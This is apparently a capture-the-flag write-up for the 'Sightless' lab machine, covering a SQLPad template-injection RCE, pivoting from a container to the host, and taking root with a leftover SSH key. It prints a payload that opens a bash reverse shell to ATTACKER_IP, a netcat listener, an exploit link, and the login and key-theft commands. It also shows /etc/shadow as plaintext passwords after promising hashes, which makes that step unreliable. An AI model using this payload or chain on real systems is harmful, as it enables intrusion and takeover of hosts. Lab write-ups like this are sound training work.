Sightless exposes a vulnerable SQLPad instance that allows remote command execution through a template injection
payload.
The initial shell lands inside a Docker container, where password hashes can be extracted.
A valid SSH password provides access to the real host.
Privilege escalation is achieved by discovering a root SSH key left behind in /tmp.
Target: sightless.htb
Initial vector: SQLPad CVE‑2022‑0944 (RCE)
Privilege escalation: leaked root SSH key in /tmp
The main site at http://sightless.htb references an internal SQLPad instance:
http://sqlpad.sightless.htb
SQLPad is a web‑based SQL editor.
The version running on the machine is vulnerable to CVE‑2022‑0944, which allows RCE via the
/api/test-connection endpoint.
Use the public exploit:
https://github.com/0xRoqeeb/sqlpad-rce-exploit-CVE-2022-0944
The exploit abuses template injection inside the JSON body. Example payload (simplified):
{
"driver": "mysql",
"host": "ATTACKER_IP",
"port": "443",
"database": "{{ process.mainModule.require('child_process').exec('/bin/bash -c \"bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1\"') }}"
}
Listener:
$ nc -nlvp 443
Trigger the exploit and a reverse shell is obtained — inside a Docker container.
Inside the container, inspect /etc/shadow:
root : blindside michael : insaneclownposse
These are real host credentials, not container‑only. SSH into the host:
$ ssh michael@sightless.htb Password: insaneclownposse
User access obtained.
Enumerate /tmp:
$ ls -la /tmp -> id_rsa
A private SSH key is left behind. Copy it to the attacker machine:
$ scp michael@sightless.htb:/tmp/id_rsa . $ chmod 400 id_rsa
SSH as root:
$ ssh -i id_rsa root@sightless.htb
Root access obtained.
Sightless is a clean chain: SQLPad RCE → Docker escape via leaked credentials → root via abandoned SSH key. The machine emphasizes careful enumeration and recognizing when a shell is inside a container rather than the host.